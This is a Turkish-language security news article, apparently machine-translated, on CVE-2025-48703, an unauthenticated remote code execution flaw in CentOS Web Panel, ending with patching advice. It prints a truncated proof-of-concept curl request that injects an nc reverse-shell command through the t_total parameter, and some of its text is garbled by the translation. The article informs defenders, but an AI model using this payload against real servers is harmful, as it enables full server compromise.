Yaygın olarak kullanılan bir web barındırma yönetimi çözümü olan CentOS Web Panelinde (CWP) kritik bir güvenlik açığı keşfedilmiştir.
CVE-2025-48703 olarak izlenen kusur, kimlik doğrulanmamış saldırganların etkilenen sistemlerde keyfi komutlar yürütmesine izin verir ve potansiyel olarak tam sunucu uzlaşmasına yol açar.
Dünya çapında CWP destekli sunucuların yöneticileri için endişelerini dile getirerek, uzaktan kod yürütmeyi (RCE) gösteren bir kavram kanıtı (POC) istismar.
.png
)
Güvenlik Açığı Detayları
Centos Web Paneli, CentOS, Almalinux, Rocky Linux ve diğer RPM tabanlı dağıtımlar için sunucu yönetimini basitleştirmek için tasarlanmış popüler ücretsiz ve açık kaynaklı bir kontrol panelidir.
Panel, web sunucularını, veritabanlarını, e-postayı ve güvenlik özelliklerini yönetmek için grafik bir arayüz sağlar ve bu da onu CPanel gibi ticari çözümlere uygun maliyetli bir alternatif haline getirir.
CVE kimliği | Etkilenen sürümler | Darbe |
CVE-2025-48703 | 0.9.8.1188, 0.9.8.1204 | Yetkısız Uzak Kod Exec |
Güvenlik açığı, güvenlik araştırmacıları tarafından bildirildiği gibi 0.9.8.1188 ve 0.9.8.1204 ve muhtemelen diğerlerini etkiler ve bir POC istismarının yayınlanmasıyla onaylanır.
İstismar iki temel sorundan yararlanır. İlk olarak, kullanıcı arayüzündeki kimlik doğrulama mekanizması, geçerli kullanıcı kimlik bilgileri olmadan isteklerin işlenmesine izin vererek yanlış uygulanır.

İkincisi, CHMOD komutu aracılığıyla dosya izinlerini ayarlamak için kullanılan T_TOTAL parametresinde bir komut enjeksiyon güvenlik açığı vardır.
Kötü niyetli bir istek hazırlayarak, bir saldırgan kimlik doğrulamasını atlayabilir ve keyfi komutlar enjekte edebilir ve bu da uzaktan kod yürütülmesine neden olabilir.
Sömürü ve etki

POC istismarı, bir saldırganın bir komutu enjekte etmek için T_TOTAL parametresini kullanarak dosya yöneticisi uç noktasına özel olarak hazırlanmış bir HTTP sonrası isteği nasıl gönderebileceğini gösterir. Örneğin, bir saldırgan yürütebilir:
curl -kis ‘https://127.0.0.1:52083/myuser/index.php?module=filemanager&acc=changePerm’ –Data ‘dosya adı = .bashrc¤tpath =/home/myuser & t_total = `nc 1.2.2.
Bu komut sunucuya saldırganın makinesine geri dönmesini ve onlara uzak bir kabuk vermesini söyler.
İstismar, kamuya bakan sistemlerde elde edilmesi veya tahmin edilmesi kolay olan geçerli bir kökü olmayan kullanıcı adı hakkında bilgi gerektirir.
Azaltma ve yanıt
Güvenlik açığı CVE-2025-48703 atandı ve Mayıs 2025’te CWP geliştiricilerine bildirildi.
Yöneticiler Centos Web Panelinin en son sürümüne yükseltme veya hemen mevcut yamaları uygulamaya çağırır.
Potansiyel saldırıları azaltmak için güvenlik duvarlarının, saldırı algılama sistemlerinin ve katı erişim kontrollerinin kullanımı da önerilmektedir.
Bu, Centos web panelinin uzaktan kod yürütme güvenlik açıkları tarafından ilk kez hedeflenmemesi değildir.
CVE-2022-44877 ve CVE-2022-25046 gibi önceki sorunlar, saldırganların kök ayrıcalıklarıyla kod yürütmesine izin vererek hızlı güncellemelerin ve uyanık izlemenin önemini vurguladı.
CVE-2025-48703’ün keşfi ve bir çalışma istismarının kamuya açıklanması, web tabanlı sunucu yönetimi panelleriyle ilişkili devam eden risklerin altını çizmektedir.
CentOS web panelini kullanan kuruluşlar, güvenlik güncellemelerine öncelik vermeli ve potansiyel uzlaşmayı önlemek için şüpheli etkinlik izlemelidir.
Güvenlik topluluğu, satıcıları ve yöneticileri ortaya çıkan tehditlere yanıt olarak proaktif önlemler almaya teşvik etmeye devam ediyor.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin